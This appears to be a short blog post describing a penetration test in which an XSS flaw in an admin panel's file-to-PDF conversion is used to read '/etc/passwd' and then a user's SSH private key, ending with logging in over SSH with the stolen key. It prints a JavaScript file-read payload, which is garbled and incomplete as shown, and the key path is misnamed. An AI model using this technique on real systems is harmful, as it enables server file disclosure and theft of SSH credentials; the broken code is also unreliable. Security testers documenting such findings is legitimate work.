hosting image

Pentest XSS Attack To SSH

Situation : 

  • Admin Panel infected with xss and uploading any file converted to pdf.


P0c from (

x=new XMLHttpRequest; 
{ document.write(this.responseText) };"GET","file:///etc/passwd"); x.send();


Explaining it in images:


Next Download the pdf :

Reading /etc/passwd success , next try to read /home/user/.ssh/rsa_id

and :


Making local id_rsa and chmod it 700.. then try to ssh !


Leave a Reply

Your email address will not be published. Required fields are marked *